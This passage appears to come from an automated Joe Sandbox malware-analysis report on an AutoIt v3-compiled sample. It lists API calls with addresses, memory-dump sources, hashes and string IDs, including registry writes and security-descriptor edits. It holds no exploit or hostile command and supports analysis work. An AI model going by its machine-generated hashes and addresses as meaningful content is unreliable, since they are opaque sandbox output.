                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f5ae56e71a1410b44ba93a8ef9829aafe01d12af90081d485a4e4b9e47b81de
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7A17D72108301AFD7119F64DC48A6BBBF9FF48360F104A19F96AA71E0DB71E984CB91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?,?), ref: 00AE16B4
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00B22B07
                                                                                                                                                                                                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B22B40
                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B22F85
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AE1488,?,00000000,?,?,?,?,00AE145A,00000000,?), ref: 00AE1865
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001053), ref: 00B22FC1
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B22FD8
                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00B22FEE
                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00B22FF9
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                    • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                                                                    • Opcode ID: 77f851a822858f0a61eb088ff366c0d49de4e0673dc324d298ea03792e31f101
                                                                                                                                                                                                                                                                                    • Instruction ID: bc7851090d8b42a5fb3269ea210701850c5e92afb67740d8b72d1f9a7a4f3b9f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77f851a822858f0a61eb088ff366c0d49de4e0673dc324d298ea03792e31f101
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8512AB30200261AFD725DF14E999BAAB7F1FF44300F1846A9F49DDB661CB71E882DB91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 00B6319B
                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B632C7
                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00B63306
                                                                                                                                                                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00B63316
                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00B6335D
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00B63369
                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00B633B2
                                                                                                                                                                                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B633C1
                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00B633D1
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00B633D5
                                                                                                                                                                                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00B633E5
                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B633EE
                                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00B633F7
                                                                                                                                                                                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B63423
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00B6343A
                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00B6347A
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B6348E
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00B6349F
                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00B634D4
                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00B634DF
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B634EA
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00B634F4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                                    • Opcode ID: 90ca39ed83326c4e09aab33e478d29ef3b6e031b561d5ebc9383a8c082a3496c
                                                                                                                                                                                                                                                                                    • Instruction ID: 3ce50040127b6b70dbc6dd33f3263a65e78a5949e429389357be62fefc4df05b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90ca39ed83326c4e09aab33e478d29ef3b6e031b561d5ebc9383a8c082a3496c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44B13C71A00215AFEB14DFA9CD49FAEBBF9EF08750F004654F915A72A0DBB4AD40CB94
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00B55532
                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,00B7DC30,?,\\.\,00B7DCD0), ref: 00B5560F
                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00B7DC30,?,\\.\,00B7DCD0), ref: 00B5577B
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                                    • Opcode ID: 352575474a86d91bf196482948c9b908f54b1c13ccc4db68a5f192cb0854b78b
                                                                                                                                                                                                                                                                                    • Instruction ID: 761a9e4115cb29b1fe54935ed6611509acf03685bbbc466e7065023f1f44dfff
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 352575474a86d91bf196482948c9b908f54b1c13ccc4db68a5f192cb0854b78b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9061E03078CA45DBC734DF24CEA1A7877E0EF19353F2040E5E806AB261DA21AD0ADB51
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00B71BC4
                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00B71BD9
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00B71BE0
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B71C35
                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00B71C55
                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B71C89
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B71CA7
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B71CB9
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00B71CCE
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00B71CE1
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(00000000), ref: 00B71D3D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00B71D58
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00B71D6C
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00B71D84
                                                                                                                                                                                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00B71DAA
                                                                                                                                                                                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00B71DC4
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 00B71DDB
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 00B71E46
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                                    • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                                                                    • Opcode ID: b14b1170eacb6f318965fc6a5631b74e51db0cf8ad86643fab65999107087274
                                                                                                                                                                                                                                                                                    • Instruction ID: f52cc4339f3288fddbb048b1ac9a19ca77596a486f9651e9d063f55e2a11d88f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b14b1170eacb6f318965fc6a5631b74e51db0cf8ad86643fab65999107087274
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBB1AF71604341AFD714DF68C984B6ABBE5FF84350F00895CF9AD9B2A1CB31E945CBA2
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00B70D81
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B70DBB
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B70E25
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B70E8D
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B70F11
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B70F61
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B70FA0
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AFFD52: _wcslen.LIBCMT ref: 00AFFD5D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B42B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B42BA5
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B42B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B42BD7
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                                    • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                                    • Opcode ID: f5399c52fb2900c62120cc3fe525b00acb23e7e0f45daa17235d567cb8ea21b3
                                                                                                                                                                                                                                                                                    • Instruction ID: 0561694a2d5663fb97fc898600c6d48763e9b99a8fe7982eb9e29125d75e383d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5399c52fb2900c62120cc3fe525b00acb23e7e0f45daa17235d567cb8ea21b3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1EE1C1326183419FC714EF28C99186AB3E1FF84314B1489ADF8AA9B7A1DB30ED45CB51
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AE25F8
                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00AE2600
                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AE262B
                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00AE2633
                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00AE2658
                                                                                                                                                                                                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00AE2675
                                                                                                                                                                                                                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00AE2685
                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AE26B8
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00AE26CC
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00AE26EA
                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00AE2706
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AE2711
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE19CD: GetCursorPos.USER32(?), ref: 00AE19E1
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE19CD: ScreenToClient.USER32(00000000,?), ref: 00AE19FE
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE19CD: GetAsyncKeyState.USER32(00000001), ref: 00AE1A23
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE19CD: GetAsyncKeyState.USER32(00000002), ref: 00AE1A3D
                                                                                                                                                                                                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,00AE199C), ref: 00AE2738
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                                    • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                                                    • Opcode ID: 3cf703903654060ecf51b704ba572d7f40091c5742aaf0b3499b446eca654ca6
                                                                                                                                                                                                                                                                                    • Instruction ID: eb3f8f647f38cb9a8f11ae7ade9cd35589793f1a91d3d780923977bd9b7928c7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cf703903654060ecf51b704ba572d7f40091c5742aaf0b3499b446eca654ca6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67B17C31A002099FDB14DFA8DD85BAE7BF5FF48714F104269FA5AAB290DB74E940CB50
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B41A60
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B414E7,?,?,?), ref: 00B41A6C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B414E7,?,?,?), ref: 00B41A7B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B414E7,?,?,?), ref: 00B41A82
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B41A99
                                                                                                                                                                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B41741
                                                                                                                                                                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B41775
                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00B4178C
                                                                                                                                                                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00B417C6
                                                                                                                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B417E2
                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00B417F9
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B41801
                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00B41808
                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B41829
                                                                                                                                                                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00B41830
                                                                                                                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B4185F
                                                                                                                                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B41881
                                                                                                                                                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B41893
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B418BA
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B418C1
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B418CA
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B418D1
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B418DA
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B418E1
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00B418ED
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B418F4
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41ADF: GetProcessHeap.KERNEL32(00000008,00B414FD,?,00000000,?,00B414FD,?), ref: 00B41AED
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B414FD,?), ref: 00B41AF4
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B41ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B414FD,?), ref: 00B41B03
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 0a214e2abc302a1daea9da441b59203a8c4d2d0a6e9c018cc85bf0d5484b2d5f
                                                                                                                                                                                                                                                                                    • Instruction ID: 46a941122bbbedfe97b987142cc16f242437e5e627506e36190593c2b37498f7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a214e2abc302a1daea9da441b59203a8c4d2d0a6e9c018cc85bf0d5484b2d5f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B714AB2D00209ABDF10DFA9DC44FAEBBB9FF04390F144665E919A7190DB319A85DB60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B6CF1D
                                                                                                                                                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B7DCD0,00000000,?,00000000,?,?), ref: 00B6CFA4
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00B6D004
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B6D054
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B6D0CF
                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00B6D112
                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00B6D221
                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00B6D2AD
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00B6D2E1
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00B6D2EE
                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00B6D3C0
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
